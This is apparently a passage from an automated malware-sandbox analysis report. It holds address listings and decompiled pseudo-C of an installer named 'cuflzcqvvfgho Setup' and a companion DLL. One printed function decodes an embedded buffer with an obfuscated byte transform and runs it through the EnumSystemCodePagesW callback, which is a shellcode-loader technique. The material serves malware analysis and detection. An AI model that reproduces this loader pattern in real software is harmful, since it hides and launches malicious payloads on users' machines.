                                            0x00406409
                                            0x00406409
                                            0x0040640c
                                            0x00000000
                                            0x0040640c
                                            0x00406226
                                            0x00406226
                                            0x00406229
                                            0x0040622f
                                            0x00406231
                                            0x00406231
                                            0x00406234
                                            0x00406237
                                            0x00406239
                                            0x0040623a
                                            0x0040623d
                                            0x004062aa
                                            0x004062aa
                                            0x004062ae
                                            0x004062b1
                                            0x004062b4
                                            0x004062b7
                                            0x004062ba
                                            0x004062bb
                                            0x004062be
                                            0x004062c0
                                            0x004062c6
                                            0x004062c9
                                            0x004062cc
                                            0x004062cf
                                            0x004062d2
                                            0x004062d8
                                            0x004062f4
                                            0x004062f7
                                            0x004062fa
                                            0x004062fd
                                            0x00406304
                                            0x0040630a
                                            0x0040630e
                                            0x004062da
                                            0x004062da
                                            0x004062de
                                            0x004062e6
                                            0x004062eb
                                            0x004062ed
                                            0x004062ef
                                            0x004062ef
                                            0x00406318
                                            0x0040631b
                                            0x00406292
                                            0x00406292
                                            0x00406298
                                            0x0040634b
                                            0x00406351
                                            0x00000000
                                            0x00000000
                                            0x00406353
                                            0x00406356
                                            0x00406359
                                            0x0040635c
                                            0x0040635f
                                            0x00406362
                                            0x00406365
                                            0x00406368
                                            0x0040636b
                                            0x00406371
                                            0x00406389
                                            0x0040638c
                                            0x0040638f
                                            0x00406392
                                            0x00406392
                                            0x00406395
                                            0x0040639b
                                            0x00406373
                                            0x00406373
                                            0x0040637b
                                            0x00406380
                                            0x00406382
                                            0x00406384
                                            0x00406384
                                            0x004063a5
                                            0x004063a8
                                            0x00406326
                                            0x0040632a
                                            0x004069ea
                                            0x00000000
                                            0x004069ea
                                            0x00406330
                                            0x00406333
                                            0x00406336
                                            0x0040633a
                                            0x0040633d
                                            0x00406343
                                            0x00406345
                                            0x00406345
                                            0x00406348
                                            0x00406348
                                            0x004063a8
                                            0x004063af
                                            0x004063af
                                            0x004063af
                                            0x004063b3
                                            0x004063b3
                                            0x004063b6
                                            0x004063b9
                                            0x004063bd
                                            0x00406a02
                                            0x00000000
                                            0x00406a02
                                            0x004063c3
                                            0x004063c6
                                            0x004063c9
                                            0x004063cc
                                            0x004063cf
                                            0x004063d2
                                            0x004063d5
                                            0x004063d7
                                            0x004063da
                                            0x004063dd
                                            0x004063e0
                                            0x004063e2
                                            0x004063e2
                                            0x004063e2
                                            0x0040657f
                                            0x0040657f
                                            0x00406582
                                            0x00406582
                                            0x00000000
                                            0x00406582
                                            0x004062a4
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406321
                                            0x0040626d
                                            0x00406271
                                            0x004069de
                                            0x00406a5a
                                            0x00406a62
                                            0x00406a69
                                            0x00406a6b
                                            0x00406a72
                                            0x00406a76
                                            0x00406a76
                                            0x00406277
                                            0x0040627a
                                            0x0040627d
                                            0x00406281
                                            0x00406284
                                            0x0040628a
                                            0x0040628c
                                            0x0040628c
                                            0x0040628f
                                            0x00000000
                                            0x0040628f
                                            0x0040631b
                                            0x00406224
                                            0x00406058
                                            0x00406058
                                            0x00406061
                                            0x00406a6f
                                            0x00406a6f
                                            0x00000000
                                            0x00406a6f
                                            0x00406067
                                            0x00000000
                                            0x00406072
                                            0x00000000
                                            0x00000000
                                            0x0040607b
                                            0x0040607e
                                            0x00406081
                                            0x00406085
                                            0x00000000
                                            0x00000000
                                            0x0040608b
                                            0x0040608e
                                            0x00406090
                                            0x00406091
                                            0x00406094
                                            0x00406096
                                            0x00406097
                                            0x00406099
                                            0x0040609c
                                            0x004060a1
                                            0x004060a6
                                            0x004060af
                                            0x004060c2
                                            0x004060c5
                                            0x004060d1
                                            0x004060f9
                                            0x004060fb
                                            0x00406109
                                            0x00406109
                                            0x0040610d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004060fd
                                            0x004060fd
                                            0x00406100
                                            0x00406101
                                            0x00406101
                                            0x00000000
                                            0x004060fd
                                            0x004060d7
                                            0x004060dc
                                            0x004060dc
                                            0x004060e5
                                            0x004060ed
                                            0x004060f0
                                            0x00000000
                                            0x004060f6
                                            0x004060f6
                                            0x00000000
                                            0x004060f6
                                            0x00000000
                                            0x00406113
                                            0x00406113
                                            0x00406117
                                            0x004069c3
                                            0x00000000
                                            0x004069c3
                                            0x00406120
                                            0x00406130
                                            0x00406133
                                            0x00406136
                                            0x00406136
                                            0x00406136
                                            0x00406139
                                            0x0040613d
                                            0x00000000
                                            0x00000000
                                            0x0040613f
                                            0x00406145
                                            0x0040616f
                                            0x00406175
                                            0x0040617c
                                            0x00000000
                                            0x0040617c
                                            0x0040614b
                                            0x0040614e
                                            0x00406153
                                            0x00406153
                                            0x0040615e
                                            0x00406166
                                            0x00406169
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004061ae
                                            0x004061b4
                                            0x004061b7
                                            0x004061c4
                                            0x004061cc
                                            0x00000000
                                            0x00000000
                                            0x00406183
                                            0x00406183
                                            0x00406187
                                            0x004069d2
                                            0x00000000
                                            0x004069d2
                                            0x00406193
                                            0x0040619e
                                            0x0040619e
                                            0x0040619e
                                            0x004061a1
                                            0x004061a4
                                            0x004061a7
                                            0x004061ac
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406473
                                            0x00406477
                                            0x00406495
                                            0x00406498
                                            0x0040649f
                                            0x004064a2
                                            0x004064a5
                                            0x004064a8
                                            0x004064ab
                                            0x004064ae
                                            0x004064b0
                                            0x004064b7
                                            0x004064b8
                                            0x004064ba
                                            0x004064bd
                                            0x004064c0
                                            0x004064c3
                                            0x004064c3
                                            0x004064c8
                                            0x00000000
                                            0x004064c8
                                            0x00406479
                                            0x0040647c
                                            0x0040647f
                                            0x00406489
                                            0x00000000
                                            0x00000000
                                            0x004064dd
                                            0x004064e1
                                            0x00406504
                                            0x00406507
                                            0x0040650a
                                            0x00406514
                                            0x004064e3
                                            0x004064e3
                                            0x004064e6
                                            0x004064e9
                                            0x004064ec
                                            0x004064f9
                                            0x004064fc
                                            0x004064fc
                                            0x00000000
                                            0x00000000
                                            0x00406520
                                            0x00406524
                                            0x00000000
                                            0x00000000
                                            0x0040652a
                                            0x0040652e
                                            0x00000000
                                            0x00000000
                                            0x00406534
                                            0x00406536
                                            0x0040653a
                                            0x0040653a
                                            0x0040653d
                                            0x00406541
                                            0x00000000
                                            0x00000000
                                            0x00406591
                                            0x00406595
                                            0x0040659c
                                            0x0040659f
                                            0x004065a2
                                            0x004065ac
                                            0x00000000
                                            0x004065ac
                                            0x00406597
                                            0x00000000
                                            0x00000000
                                            0x004065b8
                                            0x004065bc
                                            0x004065c3
                                            0x004065c6
                                            0x004065c9
                                            0x004065be
                                            0x004065be
                                            0x004065be
                                            0x004065cc
                                            0x004065cf
                                            0x004065d2
                                            0x004065d2
                                            0x004065d5
                                            0x004065d8
                                            0x004065db
                                            0x004065db
                                            0x004065de
                                            0x004065e5
                                            0x004065ea
                                            0x00000000
                                            0x00000000
                                            0x00406678
                                            0x00406678
                                            0x0040667c
                                            0x00406a1a
                                            0x00000000
                                            0x00406a1a
                                            0x00406682
                                            0x00406685
                                            0x00406688
                                            0x0040668c
                                            0x0040668f
                                            0x00406695
                                            0x00406697
                                            0x00406697
                                            0x00406697
                                            0x0040669a
                                            0x0040669d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004066fb
                                            0x004066fb
                                            0x004066ff
                                            0x00406a26
                                            0x00000000
                                            0x00406a26
                                            0x00406705
                                            0x00406708
                                            0x0040670b
                                            0x0040670f
                                            0x00406712
                                            0x00406718
                                            0x0040671a
                                            0x0040671a
                                            0x0040671a
                                            0x0040671d
                                            0x00000000
                                            0x00000000
                                            0x004064cb
                                            0x004064cb
                                            0x004064ce
                                            0x00000000
                                            0x00000000
                                            0x0040680a
                                            0x0040680e
                                            0x00406830
                                            0x00406833
                                            0x0040683d
                                            0x00000000
                                            0x0040683d
                                            0x00406810
                                            0x00406813
                                            0x00406817
                                            0x0040681a
                                            0x0040681a
                                            0x0040681d
                                            0x00000000
                                            0x00000000
                                            0x004068c7
                                            0x004068cb
                                            0x004068e9
                                            0x004068e9
                                            0x004068e9
                                            0x004068f0
                                            0x004068f7
                                            0x004068fe
                                            0x004068fe
                                            0x00000000
                                            0x004068fe
                                            0x004068cd
                                            0x004068d0
                                            0x004068d3
                                            0x004068d6
                                            0x004068dd
                                            0x00406821
                                            0x00406821
                                            0x00406824
                                            0x00000000
                                            0x00000000
                                            0x004069b8
                                            0x004069bb
                                            0x00000000
                                            0x00000000
                                            0x004065f2
                                            0x004065f4
                                            0x004065fb
                                            0x004065fc
                                            0x004065fe
                                            0x00406601
                                            0x00000000
                                            0x00000000
                                            0x00406609
                                            0x0040660c
                                            0x0040660f
                                            0x00406611
                                            0x00406613
                                            0x00406613

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                                            • Instruction ID: bc715f9ab80968e75e2fbed037c5f1c5951903de2449374fee89636cff417fa3
                                            • Opcode Fuzzy Hash: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                                            • Instruction Fuzzy Hash: 52F18571D00229CBCF28DFA8C8946ADBBB1FF45305F25816ED856BB281D3785A96CF44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 16%
                                            			E10003D10(void* __edx, void* __eflags) {
                                            				signed int _v20;
                                            				signed int _v24;
                                            				signed int _v25;
                                            				intOrPtr _v32;
                                            				intOrPtr _v36;
                                            				intOrPtr _v40;
                                            				void* __ebx;
                                            				void* __edi;
                                            				intOrPtr _t116;
                                            				void* _t127;
                                            				void* _t214;
                                            				intOrPtr* _t279;
                                            
                                            				_v20 = 0;
                                            				 *_t279 = 0xbebc200; // executed
                                            				_t116 = E1000590F(_t127, __edx, _t214); // executed
                                            				_v20 = _t116;
                                            				if(_v20 != 0) {
                                            					 *_t279 = _v20;
                                            					_v40 = 0xde;
                                            					_v36 = 0xbebc200;
                                            					E10007DC0();
                                            					_v24 = 0;
                                            					_v24 = 0;
                                            					while(_v24 < 0x12be) {
                                            						_v25 =  *((intOrPtr*)(_v24 +  &E1001A000));
                                            						_v25 = _v25 & 0x000000ff ^ _v24;
                                            						_v25 = (_v25 & 0x000000ff) + _v24;
                                            						_v25 = 0 - (_v25 & 0x000000ff);
                                            						_v25 = (_v25 & 0x000000ff) >> 0x00000002 | (_v25 & 0x000000ff) << 0x00000006;
                                            						_v25 = 0 - (_v25 & 0x000000ff);
                                            						_v25 = (_v25 & 0x000000ff) + 0x5f;
                                            						_v25 = (_v25 & 0x000000ff) >> 0x00000002 | (_v25 & 0x000000ff) << 0x00000006;
                                            						_v25 = (_v25 & 0x000000ff) + _v24;
                                            						_v25 = _v25 & 0x000000ff ^ 0x00000048;
                                            						_v25 = (_v25 & 0x000000ff) + 0x89;
                                            						_v25 = 0 - (_v25 & 0x000000ff);
                                            						_v25 = (_v25 & 0x000000ff) + _v24;
                                            						_v25 = (_v25 & 0x000000ff) >> 0x00000007 | (_v25 & 0x000000ff) << 0x00000001;
                                            						_v25 = (_v25 & 0x000000ff) - 0x9c;
                                            						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
                                            						_v25 = (_v25 & 0x000000ff) - 5;
                                            						_v25 = (_v25 & 0x000000ff) >> 0x00000006 | (_v25 & 0x000000ff) << 0x00000002;
                                            						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
                                            						_v25 = (_v25 & 0x000000ff) + _v24;
                                            						_v25 = _v25 & 0x000000ff ^ _v24;
                                            						_v25 = 0 - (_v25 & 0x000000ff);
                                            						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
                                            						_v25 = (_v25 & 0x000000ff) + 0xb6;
                                            						_v25 = (_v25 & 0x000000ff) >> 0x00000007 | (_v25 & 0x000000ff) << 0x00000001;
                                            						_v25 = 0 - (_v25 & 0x000000ff);
                                            						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
                                            						_v25 = (_v25 & 0x000000ff) + 0xa;
                                            						_v25 = 0 - (_v25 & 0x000000ff);
                                            						_v25 = (_v25 & 0x000000ff) >> 0x00000003 | (_v25 & 0x000000ff) << 0x00000005;
                                            						_v25 = (_v25 & 0x000000ff) - _v24;
                                            						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
                                            						_v25 = (_v25 & 0x000000ff) - _v24;
                                            						_v25 = _v25 & 0x000000ff ^ _v24;
                                            						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
                                            						_v25 = (_v25 & 0x000000ff) - 0x6f;
                                            						_v25 = _v25 & 0x000000ff ^ 0x00000036;
                                            						_v25 = (_v25 & 0x000000ff) + _v24;
                                            						_v25 = _v25 & 0x000000ff ^ 0x00000078;
                                            						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
                                            						_v25 = 0 - (_v25 & 0x000000ff);
                                            						 *((char*)(_v24 +  &E1001A000)) = _v25;
                                            						_v24 = _v24 + 1;
                                            					}
                                            					 *_t279 =  &E1001A000;
                                            					_v40 = 0;
                                            					_v32 = 0;
                                            					EnumSystemCodePagesW(??, ??); // executed
                                            				}
                                            				return 0;
                                            			}
















                                            APIs
                                            • _malloc.LIBCMT ref: 10003D27
                                              • Part of subcall function 1000590F: __FF_MSGBANNER.LIBCMT ref: 10005926
                                              • Part of subcall function 1000590F: __NMSG_WRITE.LIBCMT ref: 1000592D
                                              • Part of subcall function 1000590F: RtlAllocateHeap.NTDLL(00630000,00000000,00000001,?,?,?,?,10003D2C), ref: 10005952
                                            • _memset.LIBCMT ref: 10003D4F
                                            • EnumSystemCodePagesW.KERNEL32 ref: 10003FD7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: AllocateCodeEnumHeapPagesSystem_malloc_memset
                                            • String ID:
                                            • API String ID: 2588709530-0
                                            • Opcode ID: 031116cd90df89f2927efd24ffa5ba8bc50ba27358956488d1ff05d19921b791
                                            • Instruction ID: e9c2c10cac31a9925b520c158ffd2a2fd9b939d8f051bf7b59b19317cd3075d4
                                            • Opcode Fuzzy Hash: 031116cd90df89f2927efd24ffa5ba8bc50ba27358956488d1ff05d19921b791
                                            • Instruction Fuzzy Hash: 7AA1D765E191EA4ACF0A86BD50629FFBEF35E66191F0D058EECD2773C2C5900904D7B2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00405E93(CHAR* _a4) {
                                            				void* _t2;
                                            
                                            				_t2 = FindFirstFileA(_a4, 0x422588); // executed
                                            				if(_t2 == 0xffffffff) {
                                            					return 0;
                                            				}
                                            				FindClose(_t2);
                                            				return 0x422588;
                                            			}





                                            APIs
                                            • FindFirstFileA.KERNEL32(?,00422588,00421940,004057AF,00421940,00421940,00000000,00421940,00421940,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405E9E
                                            • FindClose.KERNEL32(00000000), ref: 00405EAA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: Find$CloseFileFirst
                                            • String ID:
                                            • API String ID: 2295610775-0
                                            • Opcode ID: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                                            • Instruction ID: 22d16aeb20e1d117df59da4f29a20059377f8c00669f4036672bdba2b414caf9
                                            • Opcode Fuzzy Hash: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                                            • Instruction Fuzzy Hash: 95D0123190D520ABD7015738BD0C84B7A59DB553323508F32B465F53E0C7788D928AEA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 84%
                                            			E00403981(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                            				struct HWND__* _v32;
                                            				void* _v84;
                                            				void* _v88;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed int _t35;
                                            				signed int _t37;
                                            				signed int _t39;
                                            				intOrPtr _t44;
                                            				struct HWND__* _t49;
                                            				signed int _t67;
                                            				struct HWND__* _t73;
                                            				signed int _t86;
                                            				struct HWND__* _t91;
                                            				signed int _t99;
                                            				int _t103;
                                            				signed int _t115;
                                            				signed int _t116;
                                            				int _t117;
                                            				signed int _t122;
                                            				struct HWND__* _t125;
                                            				struct HWND__* _t126;
                                            				int _t127;
                                            				long _t130;
                                            				int _t132;
                                            				int _t133;
                                            				void* _t134;
                                            				void* _t142;
                                            
                                            				_t115 = _a8;
                                            				if(_t115 == 0x110 || _t115 == 0x408) {
                                            					_t35 = _a12;
                                            					_t125 = _a4;
                                            					__eflags = _t115 - 0x110;
                                            					 *0x42051c = _t35;
                                            					if(_t115 == 0x110) {
                                            						 *0x423f48 = _t125;
                                            						 *0x420530 = GetDlgItem(_t125, 1);
                                            						_t91 = GetDlgItem(_t125, 2);
                                            						_push(0xffffffff);
                                            						_push(0x1c);
                                            						 *0x41f4f8 = _t91;
                                            						E00403E54(_t125);
                                            						SetClassLongA(_t125, 0xfffffff2,  *0x423728); // executed
                                            						 *0x42370c = E0040140B(4);
                                            						_t35 = 1;
                                            						__eflags = 1;
                                            						 *0x42051c = 1;
                                            					}
                                            					_t122 =  *0x4091ac; // 0xffffffff
                                            					_t133 = 0;
                                            					_t130 = (_t122 << 6) +  *0x423f60;
                                            					__eflags = _t122;
                                            					if(_t122 < 0) {
                                            						L34:
                                            						E00403EA0(0x40b);
                                            						while(1) {
                                            							_t37 =  *0x42051c;
                                            							 *0x4091ac =  *0x4091ac + _t37;
                                            							_t130 = _t130 + (_t37 << 6);
                                            							_t39 =  *0x4091ac; // 0xffffffff
                                            							__eflags = _t39 -  *0x423f64; // 0x2
                                            							if(__eflags == 0) {
                                            								E0040140B(1);
                                            							}
                                            							__eflags =  *0x42370c - _t133; // 0x0
                                            							if(__eflags != 0) {
                                            								break;
                                            							}
                                            							_t44 =  *0x423f64; // 0x2
                                            							__eflags =  *0x4091ac - _t44; // 0xffffffff
                                            							if(__eflags >= 0) {
                                            								break;
                                            							}
                                            							_t116 =  *(_t130 + 0x14);
                                            							E00405BBA(_t116, _t125, _t130, 0x42c800,  *((intOrPtr*)(_t130 + 0x24)));
                                            							_push( *((intOrPtr*)(_t130 + 0x20)));
                                            							_push(0xfffffc19);
                                            							E00403E54(_t125);
                                            							_push( *((intOrPtr*)(_t130 + 0x1c)));
                                            							_push(0xfffffc1b);
                                            							E00403E54(_t125);
                                            							_push( *((intOrPtr*)(_t130 + 0x28)));
                                            							_push(0xfffffc1a);
                                            							E00403E54(_t125);
                                            							_t49 = GetDlgItem(_t125, 3);
                                            							__eflags =  *0x423fcc - _t133; // 0x0
                                            							_v32 = _t49;
                                            							if(__eflags != 0) {
                                            								_t116 = _t116 & 0x0000fefd | 0x00000004;
                                            								__eflags = _t116;
                                            							}
                                            							ShowWindow(_t49, _t116 & 0x00000008);
                                            							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
                                            							E00403E76(_t116 & 0x00000002);
                                            							_t117 = _t116 & 0x00000004;
                                            							EnableWindow( *0x41f4f8, _t117);
                                            							__eflags = _t117 - _t133;
                                            							if(_t117 == _t133) {
                                            								_push(1);
                                            							} else {
                                            								_push(_t133);
                                            							}
                                            							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                                            							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                                            							__eflags =  *0x423fcc - _t133; // 0x0
                                            							if(__eflags == 0) {
                                            								_push( *0x420530);
                                            							} else {
                                            								SendMessageA(_t125, 0x401, 2, _t133);
                                            								_push( *0x41f4f8);
                                            							}
                                            							E00403E89();
                                            							E00405B98(0x420538, "cuflzcqvvfgho Setup");
                                            							E00405BBA(0x420538, _t125, _t130,  &(0x420538[lstrlenA(0x420538)]),  *((intOrPtr*)(_t130 + 0x18)));
                                            							SetWindowTextA(_t125, 0x420538);
                                            							_push(_t133);
                                            							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
                                            							__eflags = _t67;
                                            							if(_t67 != 0) {
                                            								continue;
                                            							} else {
                                            								__eflags =  *_t130 - _t133;
                                            								if( *_t130 == _t133) {
                                            									continue;
                                            								}
                                            								__eflags =  *(_t130 + 4) - 5;
                                            								if( *(_t130 + 4) != 5) {
                                            									DestroyWindow( *0x423718);
                                            									 *0x41fd08 = _t130;
                                            									__eflags =  *_t130 - _t133;
                                            									if( *_t130 <= _t133) {
                                            										goto L58;
                                            									}
                                            									_t73 = CreateDialogParamA( *0x423f40,  *_t130 +  *0x423720 & 0x0000ffff, _t125,  *(0x4091b0 +  *(_t130 + 4) * 4), _t130);
                                            									__eflags = _t73 - _t133;
                                            									 *0x423718 = _t73;
                                            									if(_t73 == _t133) {
                                            										goto L58;
                                            									}
                                            									_push( *((intOrPtr*)(_t130 + 0x2c)));
                                            									_push(6);
                                            									E00403E54(_t73);
                                            									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                                            									ScreenToClient(_t125, _t134 + 0x10);
                                            									SetWindowPos( *0x423718, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                                            									_push(_t133);
                                            									E00401389( *((intOrPtr*)(_t130 + 0xc)));
                                            									__eflags =  *0x42370c - _t133; // 0x0
                                            									if(__eflags != 0) {
                                            										goto L61;
                                            									}
                                            									ShowWindow( *0x423718, 8);
                                            									E00403EA0(0x405);
                                            									goto L58;
                                            								}
                                            								__eflags =  *0x423fcc - _t133; // 0x0
                                            								if(__eflags != 0) {
                                            									goto L61;
                                            								}
                                            								__eflags =  *0x423fc0 - _t133; // 0x0
                                            								if(__eflags != 0) {
                                            									continue;
                                            								}
                                            								goto L61;
                                            							}
                                            						}
                                            						DestroyWindow( *0x423718);
                                            						 *0x423f48 = _t133;
                                            						EndDialog(_t125,  *0x41f900);
                                            						goto L58;
                                            					} else {
                                            						__eflags = _t35 - 1;
                                            						if(_t35 != 1) {
                                            							L33:
                                            							__eflags =  *_t130 - _t133;
                                            							if( *_t130 == _t133) {
                                            								goto L61;
                                            							}
                                            							goto L34;
                                            						}
                                            						_push(0);
                                            						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
                                            						__eflags = _t86;
                                            						if(_t86 == 0) {
                                            							goto L33;
                                            						}
                                            						SendMessageA( *0x423718, 0x40f, 0, 1);
                                            						__eflags =  *0x42370c - _t133; // 0x0
                                            						return 0 | __eflags == 0x00000000;
                                            					}
                                            				} else {
                                            					_t125 = _a4;
                                            					_t133 = 0;
                                            					if(_t115 == 0x47) {
                                            						SetWindowPos( *0x420510, _t125, 0, 0, 0, 0, 0x13);
                                            					}
                                            					if(_t115 == 5) {
                                            						asm("sbb eax, eax");
                                            						ShowWindow( *0x420510,  ~(_a12 - 1) & _t115);
                                            					}
                                            					if(_t115 != 0x40d) {
                                            						__eflags = _t115 - 0x11;
                                            						if(_t115 != 0x11) {
                                            							__eflags = _t115 - 0x111;
                                            							if(_t115 != 0x111) {
                                            								L26:
                                            								return E00403EBB(_t115, _a12, _a16);
                                            							}
                                            							_t132 = _a12 & 0x0000ffff;
                                            							_t126 = GetDlgItem(_t125, _t132);
                                            							__eflags = _t126 - _t133;
                                            							if(_t126 == _t133) {
                                            								L13:
                                            								__eflags = _t132 - 1;
                                            								if(_t132 != 1) {
                                            									__eflags = _t132 - 3;
                                            									if(_t132 != 3) {
                                            										_t127 = 2;
                                            										__eflags = _t132 - _t127;
                                            										if(_t132 != _t127) {
                                            											L25:
                                            											SendMessageA( *0x423718, 0x111, _a12, _a16);
                                            											goto L26;
                                            										}
                                            										__eflags =  *0x423fcc - _t133; // 0x0
                                            										if(__eflags == 0) {
                                            											_t99 = E0040140B(3);
                                            											__eflags = _t99;
                                            											if(_t99 != 0) {
                                            												goto L26;
                                            											}
                                            											 *0x41f900 = 1;
                                            											L21:
                                            											_push(0x78);
                                            											L22:
                                            											E00403E2D();
                                            											goto L26;
                                            										}
                                            										E0040140B(_t127);
                                            										 *0x41f900 = _t127;
                                            										goto L21;
                                            									}
                                            									__eflags =  *0x4091ac - _t133; // 0xffffffff
                                            									if(__eflags <= 0) {
                                            										goto L25;
                                            									}
                                            									_push(0xffffffff);
                                            									goto L22;
                                            								}
                                            								_push(_t132);
                                            								goto L22;
                                            							}
                                            							SendMessageA(_t126, 0xf3, _t133, _t133);
                                            							_t103 = IsWindowEnabled(_t126);
                                            							__eflags = _t103;
                                            							if(_t103 == 0) {
                                            								goto L61;
                                            							}
                                            							goto L13;
                                            						}
                                            						SetWindowLongA(_t125, _t133, _t133);
                                            						return 1;
                                            					} else {
                                            						DestroyWindow( *0x423718);
                                            						 *0x423718 = _a12;
                                            						L58:
                                            						if( *0x421538 == _t133) {
                                            							_t142 =  *0x423718 - _t133; // 0x0
                                            							if(_t142 != 0) {
                                            								ShowWindow(_t125, 0xa);
                                            								 *0x421538 = 1;
                                            							}
                                            						}
                                            						L61:
                                            						return 0;
                                            					}
                                            				}
                                            			}

                                            APIs
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039BD
                                            • ShowWindow.USER32(?), ref: 004039DA
                                            • DestroyWindow.USER32 ref: 004039EE
                                            • SetWindowLongA.USER32 ref: 00403A0A
                                            • GetDlgItem.USER32 ref: 00403A2B
                                            • SendMessageA.USER32 ref: 00403A3F
                                            • IsWindowEnabled.USER32(00000000), ref: 00403A46
                                            • GetDlgItem.USER32 ref: 00403AF4
                                            • GetDlgItem.USER32 ref: 00403AFE
                                            • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403B18
                                            • SendMessageA.USER32 ref: 00403B69
                                            • GetDlgItem.USER32 ref: 00403C0F
                                            • ShowWindow.USER32(00000000,?), ref: 00403C30
                                            • EnableWindow.USER32(?,?), ref: 00403C42
                                            • EnableWindow.USER32(?,?), ref: 00403C5D
                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C73
                                            • EnableMenuItem.USER32 ref: 00403C7A
                                            • SendMessageA.USER32 ref: 00403C92
                                            • SendMessageA.USER32 ref: 00403CA5
                                            • lstrlenA.KERNEL32(00420538,?,00420538,cuflzcqvvfgho Setup), ref: 00403CCE
                                            • SetWindowTextA.USER32(?,00420538), ref: 00403CDD
                                            • ShowWindow.USER32(?,0000000A), ref: 00403E11
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                                            • String ID: cuflzcqvvfgho Setup
                                            • API String ID: 4050669955-3787857590
                                            • Opcode ID: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                                            • Instruction ID: 5fd13e9e65c650ae90d185cc2d11acb2e8fe01e0af56b63b73109b0399f4b85d
                                            • Opcode Fuzzy Hash: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                                            • Instruction Fuzzy Hash: EFC1CF71A04201BBDB20AF61ED85D2B7EBCEB4470AB40453EF541B51E1C73DAA429F5E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 96%
                                            			E004035EB(void* __eflags) {
                                            				intOrPtr _v4;
